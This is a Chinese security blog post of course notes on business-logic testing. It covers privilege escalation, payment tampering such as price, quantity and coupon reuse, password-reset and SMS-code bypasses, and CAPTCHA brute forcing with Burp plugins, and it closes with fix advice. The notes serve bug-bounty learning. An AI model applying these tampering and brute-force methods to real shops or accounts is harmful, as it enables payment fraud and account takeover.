

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/phone_icon/hacker.png">
  <link rel="icon" href="/img/browser_icon/hacker.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="0z-sIHN">
  <meta name="keywords" content="">
  
    <meta name="description" content="业务逻辑‍ 逻辑越权​ 检测原理‍ 水平越权-同级​ ​ ​ ​ ​ ​ 垂直越权-低到高​ ​ 用刚才抓到包进行修改 ​ ​ 未授权访问-无用户​ ​ ​ ‍ 检测项目真实情况下如果要测试的点很少，推荐手工进行测试。因为这些插件都需要配置，需要不少时间，有这个时间可能手工都测完了。 burp插件检测BP插件 xia_Yue ​ ​ auth_analyzer 或者官方插件商店获取 该插件使用参考">
<meta property="og:type" content="article">
<meta property="og:title" content="业务逻辑">
<meta property="og:url" content="http://example.com/2024/08/05/%E4%B8%9A%E5%8A%A1%E9%80%BB%E8%BE%91/index.html">
<meta property="og:site_name" content="0z-sIHN 的博客">
<meta property="og:description" content="业务逻辑‍ 逻辑越权​ 检测原理‍ 水平越权-同级​ ​ ​ ​ ​ ​ 垂直越权-低到高​ ​ 用刚才抓到包进行修改 ​ ​ 未授权访问-无用户​ ​ ​ ‍ 检测项目真实情况下如果要测试的点很少，推荐手工进行测试。因为这些插件都需要配置，需要不少时间，有这个时间可能手工都测完了。 burp插件检测BP插件 xia_Yue ​ ​ auth_analyzer 或者官方插件商店获取 该插件使用参考">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/essay_cover_img/33.png">
<meta property="article:published_time" content="2024-08-05T06:00:00.000Z">
<meta property="article:modified_time" content="2024-11-10T09:42:41.600Z">
<meta property="article:author" content="0z-sIHN">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/essay_cover_img/33.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>业务逻辑 - 0z-sIHN 的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>

  

<style type="text/css">
    @keyframes spin3D {
        from {
            transform: rotate3d(0.5, 0.5, 0.5, 360deg);
        }

        to {
            transform: rotate3d(0deg);
        }
    }

    #loading {
        height: 100%;
        background-color: #172d4781;
        backdrop-filter: saturate(100%) blur(10px);
        display: flex;
        justify-content: center;
        align-items: center;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        overflow: hidden;
        z-index: 99999999;
    }

    .spinner-box {
        width: 300px;
        height: 300px;
        display: flex;
        justify-content: center;
        align-items: center;
        background-color: transparent;
    }

    .leo {
        position: absolute;
        display: flex;
        justify-content: center;
        align-items: center;
        border-radius: 50%;
    }

    .blue-orbit {
        width: 175px;
        height: 175px;
        border: 2px solid #1a91fa;
        animation: spin3D 3s linear .2s infinite;
    }

    .green-orbit {
        width: 135px;
        height: 135px;
        border: 2px solid #00ffdd;
        animation: spin3D 2s linear 0s infinite;
    }

    .red-orbit {
        width: 100px;
        height: 100px;
        border: 2px solid #d75151;
        animation: spin3D 1s linear 0s infinite;
    }

    .white-orbit-a {
        width: 70px;
        height: 70px;
        border: 1px solid #faf5f5;
        animation: spin3D 3s linear 0s infinite;
    }

    .white-orbit-b {
        width: 70px;
        height: 70px;
        border: 1px solid #faf5f5;
        animation: spin3D 1.5s linear 0s infinite;
    }

    .nucleus {
        width: 1px;
        height: 1px;
        border: 1px solid #ffffff;
        animation: spin3D 1s linear 0s infinite;
    }
</style>

<div id="loading">
    <div class="spinner-box">
        <div class="blue-orbit leo"></div>
        <div class="green-orbit leo"></div>
        <div class="red-orbit leo"></div>
        <div class="white-orbit-a leo"></div>
        <div class="white-orbit-b leo"></div>
        <div class="nucleus leo"></div>
    </div>
</div>

<script>
    (function () {
        const loaded = function () {
            window.onload = function () {
                const loader = document.getElementById("loading");
                loader.className = "fadeout";
                setTimeout(function () {
                    loader.style.display = "none";
                }, 
                500
                );
            }
        };
        loaded();
    })();
</script>

  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0z-sIHN Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>联系我</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/essay_top_cover_bg/office.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="业务逻辑"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-08-05 14:00" pubdate>
          2024年8月5日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          27 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">业务逻辑</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="业务逻辑"><a href="#业务逻辑" class="headerlink" title="业务逻辑"></a>业务逻辑</h1><p>‍</p>
<h1 id="逻辑越权"><a href="#逻辑越权" class="headerlink" title="逻辑越权"></a>逻辑越权</h1><p><img src="/assets/image-20240908144659-eklrkb2.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h2 id="检测原理"><a href="#检测原理" class="headerlink" title="检测原理"></a>检测原理</h2><p>‍</p>
<h3 id="水平越权-同级"><a href="#水平越权-同级" class="headerlink" title="水平越权-同级"></a>水平越权-同级</h3><p><img src="/assets/image-20240908151737-a7lczt9.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152103-gnnxidk.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152323-d00nrms.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152426-u9lbfxw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152530-sn7x7vo.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152805-sjasuwk.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="垂直越权-低到高"><a href="#垂直越权-低到高" class="headerlink" title="垂直越权-低到高"></a>垂直越权-低到高</h3><p><img src="/assets/image-20240908152846-83rcfeh.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908152938-bcmut8c.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>用刚才抓到包进行修改</p>
<p><img src="/assets/image-20240908153123-7jawe5x.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908153140-s9l9drw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="未授权访问-无用户"><a href="#未授权访问-无用户" class="headerlink" title="未授权访问-无用户"></a>未授权访问-无用户</h3><p><img src="/assets/image-20240908153202-u7sq03v.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908153216-s1h68iw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908153233-nxfk9jz.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h2 id="检测项目"><a href="#检测项目" class="headerlink" title="检测项目"></a>检测项目</h2><p>真实情况下如果要测试的点很少，推荐手工进行测试。<br>因为这些插件都需要配置，需要不少时间，有这个时间可能手工都测完了。</p>
<h3 id="burp插件"><a href="#burp插件" class="headerlink" title="burp插件"></a>burp插件</h3><p>检测BP插件</p>
<p><a target="_blank" rel="noopener" href="https://github.com/smxiazi/xia_Yue">xia_Yue</a></p>
<p><img src="/assets/image-20240908153255-vfbg4sx.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908153315-eem6xlw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><a target="_blank" rel="noopener" href="https://github.com/simioni87/auth_analyzer">auth_analyzer</a></p>
<p>或者官方插件商店获取</p>
<p>该插件使用参考文章：<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/ychun/p/17836941.html">https://www.cnblogs.com/ychun/p/17836941.html</a></p>
<p><img src="/assets/image-20240908153349-pi0kfii.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908153408-wski5n8.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="对比项目"><a href="#对比项目" class="headerlink" title="对比项目"></a>对比项目</h3><ul>
<li><p>GitHub 地址：<a target="_blank" rel="noopener" href="https://github.com/ztosec/secscan-authcheck">https://github.com/ztosec/secscan-authcheck</a></p>
<ul>
<li>好像是有点 bug，不过小迪修好了，直接用小迪发的就行，没有的直接看 GitHub 提交记录有填坑</li>
<li>管理员用户 admin:admin123</li>
<li>使用需要配置 bp 插件或者浏览器插件，直接看 GitHub 配置就行</li>
</ul>
</li>
<li><p>GitHub 地址：<a target="_blank" rel="noopener" href="https://github.com/y1nglamore/IDOR_detect_tool">https://github.com/y1nglamore/IDOR_detect_tool</a></p>
<ul>
<li>小迪没演示这个，不过说效果也一般</li>
</ul>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<h2 id="实战SRC挖掘"><a href="#实战SRC挖掘" class="headerlink" title="实战SRC挖掘"></a>实战SRC挖掘</h2><p><a href="assets/%E7%AC%AC72-1%E5%A4%A9%EF%BC%9A%E5%AE%9E%E6%88%98SRC%E8%B6%8A%E6%9D%83%E6%9C%AA%E6%8E%88%E6%9D%83%E6%8C%96%E6%8E%98%E5%88%86%E4%BA%AB%E6%A1%88%E4%BE%8B-20240908191601-0y8f45x.pdf">实战SRC越权未授权挖掘分享案例.pdf</a></p>
<ol>
<li>找到当前用户相关的参数名，添加返回包里面的参数名参数值去提交，</li>
<li>参数值请求数据加密：JS 中找逆向算法，还原算法重新修改发包测试</li>
<li>请求包带 token：直接复用和删除测试。</li>
</ol>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="支付逻辑"><a href="#支付逻辑" class="headerlink" title="支付逻辑"></a>支付逻辑</h1><p><img src="/assets/image-20240908171643-yt9f0k8.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h2 id="常见测试"><a href="#常见测试" class="headerlink" title="常见测试"></a>常见测试</h2><blockquote>
<p>1、熟悉常见支付流程<br>选择商品和数量-选择支付及配送方式-生成订单编号-订单支付选择-完成支付<br>2、熟悉那些数据篡改<br>商品ID，购买价格，购买数量，订单属性，折扣属性，支付方式，支付状态等<br>3、熟悉那些修改方式<br>替换支付，重复支付，最小额支付，负数支付，溢出支付，优惠券支付等<br>4、熟悉那些另类方法<br>无限试用，越权支付，并发兑换，四舍五入半价购，循环利用优惠券，支付签约逻辑等</p>
</blockquote>
<p>‍</p>
<h2 id="挖掘思路"><a href="#挖掘思路" class="headerlink" title="挖掘思路"></a>挖掘思路</h2><blockquote>
<p>1、找到关键的数据包<br>可能一个支付操作有三四个数据包，我们要对数据包进行挑选。<br>2、分析数据包<br>支付数据包中会包含很多的敏感信息（账号，金额，余额，优惠等）<br>要尝试对数据包中的各个参数进行分析。<br>3、不按套路出牌<br>多去想想开发者没有想到的地方，如算法拼接，关闭开启返优惠券等<br>4、PC端尝试过，APP端也看看，小程序也试试</p>
</blockquote>
<p>‍</p>
<h2 id="修复思路"><a href="#修复思路" class="headerlink" title="修复思路"></a>修复思路</h2><blockquote>
<p>1、在后端检查订单的每一个值，包括支付状态；<br>2、校验价格、数量参数，比如产品数量只能为整数，并限制最大购买数量 ；<br>3、与第三方支付平台检查，实际支付的金额是否与订单金额一致；<br>4、如给用户退款，要使用原路、原订单退回。如：退押金，按用户原支付订单原路退回；<br>5、加密、解密、数字签名及验证，这个可以有效避免数据修改，重放攻击中的各种问题；<br>6、金额超过指定值，进行人工审核等。</p>
</blockquote>
<p>‍</p>
<h2 id="演示案例"><a href="#演示案例" class="headerlink" title="演示案例"></a>演示案例</h2><h3 id="修改购买数量"><a href="#修改购买数量" class="headerlink" title="修改购买数量"></a>修改购买数量</h3><p><img src="/assets/image-20240908173031-lbhmagt.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="篡改价格"><a href="#篡改价格" class="headerlink" title="篡改价格"></a>篡改价格</h3><p><img src="/assets/image-20240908173056-jxr631k.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="产品订单对冲"><a href="#产品订单对冲" class="headerlink" title="产品订单对冲"></a>产品订单对冲</h3><p>就是购买时抓包</p>
<ul>
<li><p>含义：</p>
<ul>
<li><p>以 A 产品的价格订单去购买 B 产品的订单价格</p>
</li>
<li><p>对方只检测付款成功的状态，不考虑对应订单的产品，就会有这样的安全问题</p>
<p><img src="/assets/image-20240908173653-yt4getc.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
</li>
<li><p>感觉有点像就是修改订单数据包，只是这个不是自己随便修改，而是参照另一个商品订单进行修改</p>
<p><img src="/assets/image-20240908173725-23mpxmw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908173813-jp373mb.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<h3 id="替换支付"><a href="#替换支付" class="headerlink" title="替换支付"></a>替换支付</h3><p>付款时抓包</p>
<p><img src="/assets/image-20240908173956-siwtwpl.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<h3 id="优惠券复用盗用"><a href="#优惠券复用盗用" class="headerlink" title="优惠券复用盗用"></a>优惠券复用盗用</h3><ul>
<li><p>复用：购买商品抓包进行分析，领取优惠券后，第一个订单不使用优惠券下单，第二个使用，对比分析数据不同</p>
<p><img src="/assets/image-20240908174527-jmf4nfh.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>注意！！此时两个订单都没有支付</p>
<p><img src="/assets/image-20240908174727-tsy44df.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>此时第三次购买商品，并修改数据包把<code>use_coupon=0</code>​改为<code>use_coupon=4</code>​</p>
<p><img src="/assets/image-20240908174757-tw2hnts.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908174822-o77u1nd.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>盗用：算出优惠券规律，如你的优惠券 id 为 1，则别人的可能为 2,3,4,5……</p>
<p>也可能是加密的值，逆向这个算法，自己修改为可用的优惠券编号</p>
<p><img src="/assets/image-20240908174641-9ue24to.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<h3 id="积分对冲溢出"><a href="#积分对冲溢出" class="headerlink" title="积分对冲溢出"></a>积分对冲溢出</h3><p><img src="/assets/image-20240908174901-gwafojc.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908180649-rlv8k21.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908185708-lu9zdwd.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908185753-751vo7a.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908190229-mrsd8r9.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908190214-hm2tnaw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240908190328-gm4cqfy.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<h2 id="SRC挖掘"><a href="#SRC挖掘" class="headerlink" title="SRC挖掘"></a>SRC挖掘</h2><p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1125">奇安信攻防社区-一次信息泄露到越权支付的实战 (butian.net)</a></p>
<p><a href="assets/%E5%AE%9E%E6%88%98SRC%E6%94%AF%E4%BB%98%E8%B4%AD%E4%B9%B0%E6%8C%96%E6%8E%98%E5%88%86%E4%BA%AB%E6%A1%88%E4%BE%8B-20240908191447-4gif5dn.docx">实战SRC支付购买挖掘分享案例.docx</a></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="机制验证"><a href="#机制验证" class="headerlink" title="机制验证"></a>机制验证</h1><p><img src="/assets/image-20240909170510-5mi8adj.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909170515-nfoslt4.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h2 id="验证码回传"><a href="#验证码回传" class="headerlink" title="验证码回传"></a>验证码回传</h2><p>通过手机找回密码，响应包中包含短信验证码。</p>
<p><img src="/assets/image-20240909170823-v8umccr.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909170842-iuvoh61.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909170858-q7r59wn.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h2 id="枚举爆破"><a href="#枚举爆破" class="headerlink" title="枚举爆破"></a>枚举爆破</h2><p>找回密码时使用位数较少的短信验证码，或者<strong>验证码没有设置有效时间限制</strong>，导致攻击者借助自动化工具在一定时间范围内爆破获得短信验证码，从而导致重置任意账号密码。</p>
<p><img src="/assets/image-20240909170956-ntc4u0j.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909171007-ap4xnlq.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>该APP实际上是发送6位验证码，但是并没有时间限制</p>
<p><img src="/assets/image-20240909171031-wrjzz76.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909171050-tk5z8kt.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<h2 id="重定向发送"><a href="#重定向发送" class="headerlink" title="重定向发送"></a>重定向发送</h2><h3 id="重定向用户"><a href="#重定向用户" class="headerlink" title="重定向用户"></a>重定向用户</h3><p><img src="/assets/image-20240909180022-4ywmo6a.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909180034-4ijyf2w.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909180607-v0e1kfc.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909180626-46fpxvm.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909180915-klinhfw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909180928-k8ja2xy.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h3 id="重定向数据包"><a href="#重定向数据包" class="headerlink" title="重定向数据包"></a>重定向数据包</h3><p>如果数据包存在发送验证邮箱或目标地址，尝试修改到自己接受地，实现拦截获取</p>
<p><img src="/assets/image-20240909181321-fu89lrp.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909181354-h1rmd0z.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909181407-9xtdcve.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909182050-oyxj7ok.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909182311-23u5ajw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h2 id="响应状态码"><a href="#响应状态码" class="headerlink" title="响应状态码"></a>响应状态码</h2><p><img src="/assets/image-20240909182416-f2wp1y1.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909182442-gu2m0zx.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240909182501-otmycvg.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>以此类推</p>
<p>‍</p>
<p>‍</p>
<h2 id="跳过步骤"><a href="#跳过步骤" class="headerlink" title="跳过步骤"></a>跳过步骤</h2><p>找回密码流程一般需要四个步骤：<br>流程：验证用户名-验证短信验证码-输入新密码-重置成功</p>
<p>这四个步骤应该紧紧相连，互相相关，只有通过了第一个步骤验证才可以进入下一个步骤，如果每个步骤之间没有进行关联性验证，就可能导致跳过关键验证步骤，从而导致重置任意账号密码。</p>
<p>‍</p>
<p>‍</p>
<h2 id="SRC挖掘-1"><a href="#SRC挖掘-1" class="headerlink" title="SRC挖掘"></a>SRC挖掘</h2><p><a href="assets/%E7%AC%AC74-1%E5%A4%A9%EF%BC%9A%E5%AE%9E%E6%88%98SRC%E9%AA%8C%E8%AF%81%E9%80%BB%E8%BE%91%E6%8C%96%E6%8E%98%E5%88%86%E4%BA%AB%E6%A1%88%E4%BE%8B-20240909182900-2rtctco.pdf">实战SRC验证逻辑挖掘分享案例.pdf</a></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="验证码安全"><a href="#验证码安全" class="headerlink" title="验证码安全"></a>验证码安全</h1><p>‍</p>
<h2 id="图片验证码识别"><a href="#图片验证码识别" class="headerlink" title="图片验证码识别"></a>图片验证码识别</h2><p>白嫖版插件地址：<a target="_blank" rel="noopener" href="https://github.com/smxiazi/NEW_xp_CAPTCHA">https://github.com/smxiazi/NEW_xp_CAPTCHA</a></p>
<ol>
<li><p>Burp 加载插件</p>
<ul>
<li>直接在插件里面加载 xp_CAPTCHA_v2.2.jdk.8.jar 或者 xp_CAPTCHA_v2.2.jdk.16.jar</li>
</ul>
</li>
<li><p>运行监听 py 文件</p>
<ul>
<li><p>在插件目录下的 NEW_xp_CAPTCHA 目录中，直接运行那个运行.bat 即可</p>
<p>然后访问插件给出的地址127.0.0.1:8899</p>
</li>
<li><p>没有 server 文件的可以直接在上面 github 地址里面下载，里面有</p>
</li>
<li><p>有个坑就是电脑名字不能是汉字的，不然会报错，py 文件里面有个地方获取计算机名</p>
</li>
</ul>
</li>
<li><p>设置插件 - 验证码地址</p>
<ul>
<li><p>在插件设置中进行设置</p>
<p><img src="/assets/image-20240911171835-0m3fhic.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
</li>
<li><p>数据包验证码填入参数，根据插件你选择的验证码编号</p>
<p> <img src="/assets/image-20240911171934-xwurmmh.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240911172022-qvejlxi.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>发包线程设置 1 后开始</p>
<p> 新版</p>
<p> <img src="/assets/image-20240911172043-envzb2y.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 老版</p>
<p> <img src="/assets/image-20240911172338-c698nhg.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>执行爆破</p>
<p> <img src="/assets/image-20240911172817-up49vwk.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
<p>‍</p>
<p>‍</p>
<h2 id="接口枚举-短信轰炸"><a href="#接口枚举-短信轰炸" class="headerlink" title="接口枚举-短信轰炸"></a>接口枚举-短信轰炸</h2><p><img src="/assets/image-20240911173503-er5lk4b.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240911173521-voxys2c.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240911173534-8jzn8np.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h2 id="重复使用-接口滥用"><a href="#重复使用-接口滥用" class="headerlink" title="重复使用-接口滥用"></a>重复使用-接口滥用</h2><p><img src="/assets/image-20240911173720-axpwnip.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<ul>
<li><p>删除验证码字段进行绕过或直接使用</p>
</li>
<li><p>Token sign 验证码等直接重复使用测试</p>
<ul>
<li>或者将其删掉进行测试</li>
</ul>
<p><img src="/assets/image-20240911173742-eq4eonf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240911173753-q1hm0hk.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240911173803-f6lvo3m.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<p>‍</p>
